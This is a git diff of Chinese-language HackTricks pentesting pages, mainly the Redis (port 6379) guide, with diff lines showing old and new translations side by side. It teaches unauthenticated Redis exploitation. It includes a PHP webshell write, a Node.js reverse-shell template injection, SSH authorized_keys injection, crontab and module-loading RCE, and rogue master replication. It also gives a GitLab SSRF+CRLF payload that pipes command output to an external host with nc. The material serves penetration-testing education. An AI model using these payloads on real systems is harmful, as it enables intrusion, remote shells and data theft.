然后,将您的 IP 地址和端口放入 **R-Shell** 选项中,然后点击 **R-shell** 以获取 shell
## 参考资料
## 参考文献
* [https://resources.infosecinstitute.com/exploiting-x11-unauthenticated-access/#gref](https://resources.infosecinstitute.com/exploiting-x11-unauthenticated-access/#gref)
* [https://bitvijays.github.io/LFF-IPS-P2-VulnerabilityAnalysis.html](https://bitvijays.github.io/LFF-IPS-P2-VulnerabilityAnalysis.html)
@ -164,29 +165,30 @@ nc -lvp 5555
<figure><img src="../.gitbook/assets/image (380).png" alt=""><figcaption></figcaption></figure>
加入[**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy)服务器,与经验丰富的黑客和赏金猎人交流!
加入 [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) 服务器,与经验丰富的黑客和漏洞赏金猎人交流!
**黑客见解**\
参与深入探讨黑客行为的刺激和挑战的内容
参与深入探讨黑客的刺激与挑战的内容
**实时黑客新闻**\
通过实时新闻和见解了解快节奏的黑客世界
通过实时新闻和见解,跟上快速变化的黑客世界
**最新公告**\
了解最新的赏金计划发布和重要平台更新
了解最新的漏洞赏金发布和重要平台更新
**加入我们的** [**Discord**](https://discord.com/invite/N3FrSbmwdy),立即与顶尖黑客合作!
**加入我们** [**Discord**](https://discord.com/invite/N3FrSbmwdy),今天就开始与顶级黑客合作!
{% hint style="success" %}
学习和实践 AWS 黑客技术:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
学习和实践 GCP 黑客技术:<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>从零开始学习AWS黑客技术成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS Red Team Expert</strong></a><strong></strong></summary>
<summary>支持 HackTricks</summary>
支持HackTricks的其他方式
* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)
* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或 **关注**我们的**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或 **在 Twitter 上关注** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享黑客技巧。
</details>
{% endhint %}

182
network-services-pentesting/6379-pentesting-redis.md
View file

@ -1,39 +1,40 @@
# 6379 - Redis 渗透测试
# 6379 - Pentesting Redis
{% hint style="success" %}
学习与实践 AWS 黑客技术:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
学习与实践 GCP 黑客技术:<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>从零开始学习 AWS 黑客技术,成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS 红队专家)</strong></a><strong></strong></summary>
<summary>支持 HackTricks</summary>
支持 HackTricks 的其他方式:
* 如果您想看到您的**公司在 HackTricks 中做广告**或**下载 PDF 版的 HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方 PEASS & HackTricks 商品**](https://peass.creator-spring.com)
* 探索[**PEASS 家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或在 **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)** 上关注**我们。
* 通过向 [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享您的黑客技巧。
* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或 **关注** 我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 分享黑客技巧。
</details>
{% endhint %}
<figure><img src="../.gitbook/assets/image (380).png" alt=""><figcaption></figcaption></figure>
加入 [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) 服务器,与经验丰富的黑客和赏金猎人交流!
加入 [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) 服务器,与经验丰富的黑客和漏洞赏金猎人交流!
**黑客见解**\
参与深入探讨黑客行为的刺激和挑战的内容
参与深入探讨黑客的刺激与挑战的内容
**实时黑客新闻**\
通过实时新闻和见解及时了解快节奏的黑客世界
通过实时新闻和见解,跟上快速变化的黑客世界
**最新公告**\
了解最新的赏金计划发布和重要平台更新
了解最新的漏洞赏金计划和重要平台更新
**加入我们的** [**Discord**](https://discord.com/invite/N3FrSbmwdy) 并开始与顶尖黑客合作!
**今天就加入我们的** [**Discord**](https://discord.com/invite/N3FrSbmwdy),与顶尖黑客开始合作吧!
## 基本信息
根据[文档](https://redis.io/topics/introduction)Redis 是一个开源BSD 许可),用作**数据库**、缓存和消息代理的**内存数据结构存储**
来自 [文档](https://redis.io/topics/introduction)Redis 是一个开源BSD 许可),内存中的 **数据结构存储**,用作 **数据库**、缓存和消息代理
默认情况下Redis 使用基于纯文本的协议,但您必须记住它也可以实现**ssl/tls**。了解如何[在这里使用 ssl/tls 运行 Redis](https://fossies.org/linux/redis/TLS.md)。
默认情况下Redis 使用基于纯文本的协议,但您必须记住,它也可以实现 **ssl/tls**。了解如何 [在这里运行带有 ssl/tls 的 Redis](https://fossies.org/linux/redis/TLS.md)。
**默认端口:** 6379
```
@ -42,7 +43,7 @@ PORT STATE SERVICE VERSION
```
## 自动枚举
一些自动化工具可以帮助获取来自 Redis 实例的信息
一些可以帮助从 Redis 实例获取信息的自动化工具
```bash
nmap --script redis-info -sV -p 6379 <IP>
msf> use auxiliary/scanner/redis/redis_server
@ -51,14 +52,14 @@ msf> use auxiliary/scanner/redis/redis_server
### 横幅
Redis是一种基于**文本的协议**,您可以只需**在套接字中发送命令**返回的值就可以被读取。还要记住Redis可以使用**ssl/tls**运行(但这很奇怪)。
Redis 是一个 **基于文本的协议**,你可以直接 **在套接字中发送命令**返回的值将是可读的。还要记住Redis 可以使用 **ssl/tls** 运行(但这很奇怪)。
常规Redis实例中您可以使用`nc`进行连接,或者也可以使用`redis-cli`
一个常规的 Redis 实例中,你可以直接使用 `nc` 连接,或者你也可以使用 `redis-cli`
```bash
nc -vn 10.10.10.10 6379
redis-cli -h 10.10.10.10 # sudo apt-get install redis-tools
```
您可以尝试的**第一个命令**是**`info`**。它可能会返回Redis实例的信息或者可能会返回类似以下内容的信息
您可以尝试的**第一个命令**是**`info`**。它**可能返回包含**Redis实例**信息的输出****或者返回类似以下内容**
```
-NOAUTH Authentication required.
```
@ -66,25 +67,25 @@ redis-cli -h 10.10.10.10 # sudo apt-get install redis-tools
### Redis身份验证
**默认情况下**Redis可以在**没有凭据**的情况下访问。但是,它可以被**配置**为仅支持**密码,或用户名+密码**。\
可以在_**redis.conf**_文件中使用参数`requirepass`**设置密码**或者在服务重新启动连接到它并运行`config set requirepass p@ss$12E45`来**临时设置**密码。\
**默认情况下**Redis可以**不需要凭据**进行访问。然而,它可以被**配置**为仅支持**密码或用户名 + 密码**。\
可以在_**redis.conf**_文件中使用参数`requirepass`**设置密码****或临时**,直到服务重启,连接到它并运行:`config set requirepass p@ss$12E45`。\
此外可以在_**redis.conf**_文件中的参数`masteruser`中配置**用户名**。
{% hint style="info" %}
如果仅配置了密码,则使用的用户名是“**default**”。\
另外,请注意**外部无法找到**Redis是仅配置了密码还是用户名+密码。
如果仅配置了密码,则使用的用户名是"**default**"。\
另外,请注意**无法从外部找到**Redis是否仅配置了密码或用户名+密码。
{% endhint %}
在这种情况下,您将**需要找到有效的凭据**才能与Redis交互因此可以尝试[**暴力破解**](../generic-methodologies-and-resources/brute-force.md#redis)。\
**如果找到有效凭据,需要在与命令建立连接后进行身份验证的会话中进行身份验证**
在这种情况下,您将**需要找到有效的凭据**以与Redis进行交互因此您可以尝试[**暴力破解**](../generic-methodologies-and-resources/brute-force.md#redis)。\
**如果您找到了有效的凭据,您需要在建立连接后使用以下命令进行身份验证**
```bash
AUTH <username> <password>
```
**有效凭据** 将会得到以下回应:`+OK`
**有效凭据**将会返回: `+OK`
### **认证枚举**
### **认证枚举**
如果 Redis 服务器允许**匿名连接**或您已获得有效凭据,您可以使用以下**命令**启动服务的枚举过程:
如果Redis服务器允许**匿名连接**或您已获得有效凭据,您可以使用以下**命令**启动服务的枚举过程:
```bash
INFO
[ ... Redis response with info ... ]
@ -93,29 +94,29 @@ client list
CONFIG GET *
[ ... Get config ... ]
```
**其他Redis命令** [**可以在这里找到**](https://redis.io/topics/data-types-intro) **和** [**这里**](https://lzone.de/cheat-sheet/Redis)****
**其他 Redis 命令** [**可以在这里找到**](https://redis.io/topics/data-types-intro) **和** [**这里**](https://lzone.de/cheat-sheet/Redis)**.**
请注意,**实例的Redis命令可以在_redis.conf_文件中重命名**或删除。例如以下行将删除FLUSHDB命令
请注意,**实例的 Redis 命令可以在 _redis.conf_ 文件中重命名或删除**。例如,这一行将删除命令 FLUSHDB:
```
rename-command FLUSHDB ""
```
更多关于如何安全配置Redis服务的信息请查看[https://www.digitalocean.com/community/tutorials/how-to-install-and-secure-redis-on-ubuntu-18-04](https://www.digitalocean.com/community/tutorials/how-to-install-and-secure-redis-on-ubuntu-18-04)
有关安全配置Redis服务的更多信息请访问[https://www.digitalocean.com/community/tutorials/how-to-install-and-secure-redis-on-ubuntu-18-04](https://www.digitalocean.com/community/tutorials/how-to-install-and-secure-redis-on-ubuntu-18-04)
您还可以使用命令`monitor`实时监视执行的Redis命令或者使用`slowlog get 25`获取前25个最慢的查询
您还可以使用命令**`monitor`**实时**监控执行的Redis命令**,或使用**`slowlog get 25`**获取**25个最慢的查询**
在这里找到更多关于Redis命令的有趣信息:[https://lzone.de/cheat-sheet/Redis](https://lzone.de/cheat-sheet/Redis)
在这里找到更多有趣的Redis命令信息:[https://lzone.de/cheat-sheet/Redis](https://lzone.de/cheat-sheet/Redis)
### **转储数据库**
在Redis中**数据库是从0开始编号的数字**。您可以在`info`命令的输出中的"Keyspace"块中找到是否有任何数据库正在使用:
在Redis中**数据库是从0开始的数字**。您可以在命令`info`的“Keyspace”部分的输出中找到是否有人在使用:
![](<../.gitbook/assets/image (766).png>)
或者您可以使用以下命令获取所有**keyspaces**(数据库):
或者您可以通过以下方式获取所有**键空间**(数据库):
```
INFO keyspace
```
这个例子中,正在使用**数据库 0 和 1**。**数据库 0 包含 4 个键,数据库 1 包含 1 个**。默认情况下Redis 将使用数据库 0。导出例如数据库 1您需要执行
该示例中,**数据库 0 和 1** 正在使用中。**数据库 0 包含 4 个键,数据库 1 包含 1 个**。默认情况下Redis 将使用数据库 0。为了导出例如数据库 1您需要执行
```bash
SELECT 1
[ ... Indicate the database ... ]
@ -124,9 +125,9 @@ KEYS *
GET <KEY>
[ ... Get Key ... ]
```
在运行 `GET <KEY>` 时,如果出现 `-WRONGTYPE 操作针对保存了错误类型值的键` 错误,这是因为该键可能不是字符串或整数,需要使用特殊运算符来显示它。
在运行 `GET <KEY>` 时,如果出现以下错误 `-WRONGTYPE Operation against a key holding the wrong kind of value`,这可能是因为该键的类型不是字符串或整数,需要使用特殊操作符来显示它。
了解键的类型,请使用 `TYPE` 命令,以下是列表和哈希键的示例。
知道键的类型,请使用 `TYPE` 命令,下面是列表和哈希键的示例。
```bash
TYPE <KEY>
[ ... Type of the Key ... ]
@ -138,34 +139,34 @@ HGET <KEY> <FIELD>
# If the type used is weird you can always do:
DUMP <key>
```
**使用npm** [**redis-dump**](https://www.npmjs.com/package/redis-dump) **或python** [**redis-utils**](https://pypi.org/project/redis-utils/) **来转储数据库**
**使用 npm 导出数据库**[ **redis-dump**](https://www.npmjs.com/package/redis-dump) **或 python** [**redis-utils**](https://pypi.org/project/redis-utils/)
<figure><img src="../.gitbook/assets/image (380).png" alt=""><figcaption></figcaption></figure>
加入[**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) 服务器,与经验丰富的黑客和赏金猎人交流!
加入 [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) 服务器,与经验丰富的黑客和漏洞赏金猎人交流!
**黑客见解**\
参与深入探讨黑客行为的刺激和挑战的内容
参与深入探讨黑客的刺激与挑战的内容
**实时黑客新闻**\
通过实时新闻和见解及时了解快节奏的黑客世界
通过实时新闻和见解,跟上快速变化的黑客世界
**最新公告**\
了解最新的赏金任务发布和重要平台更新
了解最新的漏洞赏金计划和重要平台更新
加入我们的[**Discord**](https://discord.com/invite/N3FrSbmwdy),立即开始与顶尖黑客合作!
**今天就加入我们** [**Discord**](https://discord.com/invite/N3FrSbmwdy),与顶尖黑客开始合作!
## Redis RCE
### 交互式Shell
### 交互式 Shell
[**redis-rogue-server**](https://github.com/n0b0dyCN/redis-rogue-server) 可以自动在Redis(<=5.0.5)中获取交互式Shell或反向Shell。
[**redis-rogue-server**](https://github.com/n0b0dyCN/redis-rogue-server) 可以在 Redis(<=5.0.5) 中自动获取交互式 shell 或反向 shell。
```
./redis-rogue-server.py --rhost <TARGET_IP> --lhost <ACCACKER_IP>
```
### PHP Webshell
信息来自[**这里**](https://web.archive.org/web/20191201022931/http://reverse-tcp.xyz/pentest/database/2017/02/09/Redis-Hacking-Tips.html)。您必须知道**网站文件夹的路径**
来自[**这里**](https://web.archive.org/web/20191201022931/http://reverse-tcp.xyz/pentest/database/2017/02/09/Redis-Hacking-Tips.html)的信息。你必须知道**网站文件夹**的**路径**
```
root@Urahara:~# redis-cli -h 10.85.0.52
10.85.0.52:6379> config set dir /usr/share/nginx/html
@ -177,11 +178,13 @@ OK
10.85.0.52:6379> save
OK
```
​如果 webshell 访问异常,您可以在备份后清空数据库并重试,记得恢复数据库。
### 模板 Webshell
就像在前面的部分中一样,您还可以覆盖一些将由模板引擎解释的 HTML 模板文件并获取 shell。
与前一节一样,您还可以覆盖一些将被模板引擎解释的 html 模板文件,从而获得 shell。
例如,根据[**此解析**](https://www.neteye-blog.com/2022/05/cyber-apocalypse-ctf-2022-red-island-writeup/),您可以看到攻击者在由 **nunjucks 模板引擎** 解释的 HTML 中注入了 **rev shell**
例如,按照 [**这篇文章**](https://www.neteye-blog.com/2022/05/cyber-apocalypse-ctf-2022-red-island-writeup/),您可以看到攻击者在 **nunjucks 模板引擎** 解释的 **html** 中注入了一个 **rev shell**
```javascript
{{ ({}).constructor.constructor(
"var net = global.process.mainModule.require('net'),
@ -196,19 +199,19 @@ sh.stderr.pipe(client);
)()}}
```
{% hint style="warning" %}
请注意,**几个模板引擎会缓存**模板在**内存**中,因此即使您覆盖它们,新模板**不会被执行**。在这种情况下要么开发人员保留了自动重新加载功能要么您需要对服务进行DoS攻击并期望它将自动重新启动)。
注意 **多个模板引擎会将** 模板缓存到 **内存中**,因此即使你覆盖了它们,新的模板也 **不会被执行**。在这种情况下,要么开发者保持了自动重载的状态,要么你需要对服务进行 DoS 攻击(并期望它会自动重新启动)。
{% endhint %}
### SSH
示例[来自这里](https://blog.adithyanak.com/oscp-preparation-guide/enumeration)
示例 [来自这里](https://blog.adithyanak.com/oscp-preparation-guide/enumeration)
请注意**`config get dir`**的结果可能会在其他手动利用命令之后发生更改。建议在登录到Redis后立即运行它。在**`config get dir`**的输出中,您可以找到**redis用户**的**home**通常为_/var/lib/redis_或_/home/redis/.ssh_知道这一点后您就知道可以在哪里写入`authenticated_users`文件以通过ssh访问**使用redis用户**。如果您知道其他有效用户的主目录,并且具有可写权限,您也可以滥用它:
请注意 **`config get dir`** 的结果可能会在其他手动利用命令后发生变化。建议在登录 Redis 后立即运行它。在 **`config get dir`** 的输出中,你可以找到 **redis 用户****家目录**(通常是 _/var/lib/redis__/home/redis/.ssh_),知道这一点后,你就知道可以在哪里写入 `authenticated_users` 文件以通过 ssh **以 redis 用户身份** 访问。如果你知道其他有效用户的家目录并且你有可写权限,你也可以利用它:
1. 在您的计算机上生成ssh公钥-私钥对:**`ssh-keygen -t rsa`**
1. 在你的电脑上生成一个 ssh 公私钥对:**`ssh-keygen -t rsa`**
2. 将公钥写入文件:**`(echo -e "\n\n"; cat ~/id_rsa.pub; echo -e "\n\n") > spaced_key.txt`**
3. 将文件导入redis**`cat spaced_key.txt | redis-cli -h 10.85.0.52 -x set ssh_key`**
4. 将公钥保存到redis服务器上的**authorized\_keys**文件中:
3. 将文件导入 redis**`cat spaced_key.txt | redis-cli -h 10.85.0.52 -x set ssh_key`**
4. 将公钥保存到 redis 服务器上的 **authorized\_keys** 文件中:
```
root@Urahara:~# redis-cli -h 10.85.0.52
@ -219,9 +222,9 @@ OK
10.85.0.52:6379> save
OK
```
5. 最后,您可以使用私钥**ssh**到**redis服务器****ssh -i id\_rsa redis@10.85.0.52**
5. 最后,你可以使用私钥 **ssh** 连接到 **redis 服务器****ssh -i id\_rsa redis@10.85.0.52**
**此技术在此处自动化:**[https://github.com/Avinash-acid/Redis-Server-Exploit](https://github.com/Avinash-acid/Redis-Server-Exploit)
**此技术在这里自动化:** [https://github.com/Avinash-acid/Redis-Server-Exploit](https://github.com/Avinash-acid/Redis-Server-Exploit)
### Crontab
```
@ -234,16 +237,16 @@ OK
root@Urahara:~# redis-cli -h 10.85.0.52 save
OK
```
最后一个示例适用于Ubuntu对于**Centos**,上述命令应为:`redis-cli -h 10.85.0.52 config set dir /var/spool/cron/`
最后一个示例适用于 Ubuntu对于 **Centos**,上述命令应为:`redis-cli -h 10.85.0.52 config set dir /var/spool/cron/`
这种方法也可以用来赚取比特币:[yam](https://www.v2ex.com/t/286981#reply14)
方法也可以用来赚取比特币:[yam](https://www.v2ex.com/t/286981#reply14)
### 加载Redis模块
### 加载 Redis 模块
1. 按照[https://github.com/n0b0dyCN/RedisModules-ExecuteCommand](https://github.com/n0b0dyCN/RedisModules-ExecuteCommand)的说明,您可以**编译一个Redis模块来执行任意命令**
2. 然后需要某种方式**上传编译好的**模块
3. 在运行时**加载上传的模块**`MODULE LOAD /path/to/mymodule.so`
4. **列出已加载的模块**以检查是否正确加载:`MODULE LIST`
1. 按照 [https://github.com/n0b0dyCN/RedisModules-ExecuteCommand](https://github.com/n0b0dyCN/RedisModules-ExecuteCommand) 的说明,您可以 **编译一个 redis 模块以执行任意命令**
2. 然后需要某种方式**上传编译好的** 模块
3. **在运行时加载上传的模块**,使用 `MODULE LOAD /path/to/mymodule.so`
4. **列出已加载的模块**以检查是否正确加载:`MODULE LIST`
5. **执行** **命令**
```
@ -253,19 +256,19 @@ OK
"root\n"
127.0.0.1:6379> system.rev 127.0.0.1 9999
```
6. 您可以随时卸载模块:`MODULE UNLOAD mymodule`
6. 随时卸载模块:`MODULE UNLOAD mymodule`
### LUA沙盒绕过
### LUA 沙箱绕过
[**这里**](https://www.agarri.fr/blog/archives/2014/09/11/trying\_to\_hack\_redis\_via\_http\_requests/index.html)您可以看到Redis使用**EVAL**命令来执行**Lua代码沙盒**。在链接的帖子中,您可以看到如何使用**dofile**函数滥用它,但[显然](https://stackoverflow.com/questions/43502696/redis-cli-code-execution-using-eval)这已不再可能。无论如何,如果您可以**绕过Lua**沙盒,就可以在系统上**执行任意**命令。此外,从同一帖子中,您可以看到一些**导致DoS**的**选项**
[**这里**](https://www.agarri.fr/blog/archives/2014/09/11/trying\_to\_hack\_redis\_via\_http\_requests/index.html) 您可以看到 Redis 使用命令 **EVAL** 来执行 **沙箱中的 Lua 代码**。在链接的帖子中,您可以看到 **如何滥用它** 使用 **dofile** 函数,但 [显然](https://stackoverflow.com/questions/43502696/redis-cli-code-execution-using-eval) 这不再可能。无论如何,如果您可以 **绕过 Lua** 沙箱,您可以 **在系统上执行任意** 命令。此外,从同一帖子中,您可以看到一些 **导致 DoS 的选项**
一些**用于绕过LUA**的CVE
一些 **CVE 用于逃离 LUA**
* [https://github.com/aodsec/CVE-2022-0543](https://github.com/aodsec/CVE-2022-0543)
### 主从模块
Redis的所有操作会自动同步到从Redis这意味着我们可以将漏洞Redis视为从Redis连接到我们自己控制的主Redis然后我们可以在我们自己的Redis中输入命令。
Redis 的所有操作会自动同步到从 Redis这意味着我们可以将漏洞 Redis 视为从 Redis连接到我们自己控制的主 Redis然后我们可以向自己的 Redis 输入命令。
```
master redis : 10.85.0.51 (Hacker's Server)
slave redis : 10.85.0.52 (Target Vulnerability Server)
@ -279,7 +282,7 @@ set mykey2 helloworld
```
## SSRF 与 Redis 通信
如果你可以发送**明文**请求**到 Redis**,你可以与其**进行通信**,因为 Redis 会逐行读取请求,并只对其不理解的行作出错误响应
如果您可以发送 **明文** 请求 **到 Redis**,您可以 **与其通信**,因为 Redis 会逐行读取请求,并仅对它不理解的行返回错误
```
-ERR wrong number of arguments for 'get' command
-ERR unknown command 'Host:'
@ -289,50 +292,51 @@ set mykey2 helloworld
-ERR unknown command 'Cache-Control:'
-ERR unknown command 'Connection:'
```
因此,如果您在网站中发现了**SSRF漏洞**,并且可以**控制**一些**标头**可能是通过CRLF漏洞或**POST参数**您将能够向Redis发送任意命令。
因此,如果您在网站中发现了一个 **SSRF vuln**,并且您可以 **控制** 一些 **headers**(可能通过 CRLF vuln**POST 参数**,您将能够向 Redis 发送任意命令。
### 示例Gitlab SSRF + CRLF 到 Shell
**Gitlab11.4.7**中发现了一个**SSRF**漏洞和一个**CRLF**漏洞。**SSRF**漏洞出现在**从URL功能导入项目**中当创建一个新项目时允许访问任意IP形式为\[0:0:0:0:0:ffff:127.0.0.1]这将访问127.0.0.1),而**CRLF**漏洞则是通过向**URL**添加**%0D%0A**字符来利用。
**Gitlab11.4.7** 中发现了一个 **SSRF** 漏洞和一个 **CRLF**。该 **SSRF** 漏洞存在于 **从 URL 导入项目功能** 中,在创建新项目时允许以 \[0:0:0:0:0:ffff:127.0.0.1] 的形式访问任意 IP这将访问 127.0.0.1),而 **CRLF** 漏洞则通过在 **URL** 中添加 **%0D%0A** 字符来利用。
因此,可以**利用这些漏洞与管理队列的Redis实例进行通信**,并滥用这些队列来**执行代码**。Redis队列滥用的有效载荷是:
因此,可以 **利用这些漏洞与管理来自 gitlab 的队列的 Redis 实例进行通信**,并利用这些队列 **获得代码执行**。Redis 队列滥用有效载荷是:
```
multi
sadd resque:gitlab:queues system_hook_push
lpush resque:gitlab:queue:system_hook_push "{\"class\":\"GitlabShellWorker\",\"args\":[\"class_eval\",\"open(\'|whoami | nc 192.241.233.143 80\').read\"],\"retry\":3,\"queue\":\"system_hook_push\",\"jid\":\"ad52abc5641173e217eb2e52\",\"created_at\":1513714403.8122594,\"enqueued_at\":1513714403.8129568}"
exec
```
而利用SSRF和CRLF滥用URL编码请求执行`whoami`并通过`nc`发送输出的请求是:
并且**URL编码**请求**滥用SSRF**和**CRLF**来执行`whoami`并通过`nc`发送回输出的内容是:
```
git://[0:0:0:0:0:ffff:127.0.0.1]:6379/%0D%0A%20multi%0D%0A%20sadd%20resque%3Agitlab%3Aqueues%20system%5Fhook%5Fpush%0D%0A%20lpush%20resque%3Agitlab%3Aqueue%3Asystem%5Fhook%5Fpush%20%22%7B%5C%22class%5C%22%3A%5C%22GitlabShellWorker%5C%22%2C%5C%22args%5C%22%3A%5B%5C%22class%5Feval%5C%22%2C%5C%22open%28%5C%27%7Ccat%20%2Fflag%20%7C%20nc%20127%2E0%2E0%2E1%202222%5C%27%29%2Eread%5C%22%5D%2C%5C%22retry%5C%22%3A3%2C%5C%22queue%5C%22%3A%5C%22system%5Fhook%5Fpush%5C%22%2C%5C%22jid%5C%22%3A%5C%22ad52abc5641173e217eb2e52%5C%22%2C%5C%22created%5Fat%5C%22%3A1513714403%2E8122594%2C%5C%22enqueued%5Fat%5C%22%3A1513714403%2E8129568%7D%22%0D%0A%20exec%0D%0A%20exec%0D%0A/ssrf123321.git
```
由于某种原因(就像[_https://liveoverflow.com/gitlab-11-4-7-remote-code-execution-real-world-ctf-2018/_](https://liveoverflow.com/gitlab-11-4-7-remote-code-execution-real-world-ctf-2018/)的作者所述,这些信息来源于那里用使用`git`方案而不是`http`方案。
_出于某种原因正如_ [_https://liveoverflow.com/gitlab-11-4-7-remote-code-execution-real-world-ctf-2018/_](https://liveoverflow.com/gitlab-11-4-7-remote-code-execution-real-world-ctf-2018/) _的作者所述)利用`git`方案而不是`http`方案成功_
<figure><img src="../.gitbook/assets/image (380).png" alt=""><figcaption></figcaption></figure>
加入[**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy)服务器,与经验丰富的黑客和赏金猎人交流!
加入 [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) 服务器,与经验丰富的黑客和漏洞赏金猎人交流!
**黑客见解**\
参与深入探讨黑客行为的刺激和挑战的内容
参与深入探讨黑客的刺激与挑战的内容
**实时黑客新闻**\
通过实时新闻和见解了解快节奏的黑客世界
通过实时新闻和见解,跟上快速变化的黑客世界
**最新公告**\
通过最新的赏金计划发布和重要平台更新保持信息更新
了解最新的漏洞赏金计划和重要平台更新
**加入我们的** [**Discord**](https://discord.com/invite/N3FrSbmwdy) 并开始与顶尖黑客合作!
**今天就加入我们的** [**Discord**](https://discord.com/invite/N3FrSbmwdy),与顶尖黑客开始合作!
{% hint style="success" %}
学习与实践 AWS 黑客技术:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
学习与实践 GCP 黑客技术:<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>从零开始成为AWS黑客大师学习</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS红队专家</strong></a><strong></strong></summary>
<summary>支持 HackTricks</summary>
支持HackTricks的其他方式
* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)
* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或 **关注**我们的**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**。**
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或 **在** **Twitter** 🐦 **上关注我们** [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub 仓库提交 PR 分享黑客技巧。
</details>
{% endhint %}

40
network-services-pentesting/700-pentesting-epp.md
View file

@ -1,39 +1,41 @@
# 700 - Pentesting EPP
{% hint style="success" %}
学习和实践 AWS 黑客技术:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
学习和实践 GCP 黑客技术:<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>从零开始学习AWS黑客技术成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS红队专家</strong></a><strong></strong></summary>
<summary>支持 HackTricks</summary>
支持HackTricks的其他方式
* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
